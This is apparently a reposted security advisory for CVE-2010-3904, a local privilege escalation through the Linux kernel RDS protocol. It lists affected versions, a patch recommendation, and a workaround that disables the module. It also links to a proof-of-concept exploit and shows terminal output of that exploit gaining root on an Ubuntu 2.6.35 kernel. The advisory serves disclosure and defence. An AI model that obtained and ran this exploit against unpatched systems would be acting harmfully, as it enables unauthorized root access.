10.21
—————–
Advisory Name: Linux RDS Protocol Local Privilege Escalation
Release Date: 2010-10-19
Application: Linux Kernel
Versions: 2.6.30 – 2.6.36-rc8
Severity: High
Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >
Vendor Status: Patch Released
CVE Candidate: CVE-2010-3904
—————–
Recommendation:
Users should install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
Preventing the RDS kernel module from loading is an effective workaround. This can be accomplished by executing the following command as root:
echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds
Proof-of-Concept Exploit:
http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Testing:
b0t@snow:/tmp$ gcc -o rds linux-rds-exploit.c
b0t@snow:/tmp$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xffffffffa0aab8c0
[+] Resolved rds_ioctl to 0xffffffffa0aa4000
[+] Resolved commit_creds to 0xffffffff810863b0
[+] Resolved prepare_kernel_cred to 0xffffffff81086880
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
# uname -a
Linux snow 2.6.35-22-generic #34-Ubuntu SMP Sun Oct 10 09:26:05 UTC 2010 x86_64 GNU/Linux
# id
uid=0(root) gid=0(root) groups=0(root)
#
Reference:
No Comment.
Add Your Comment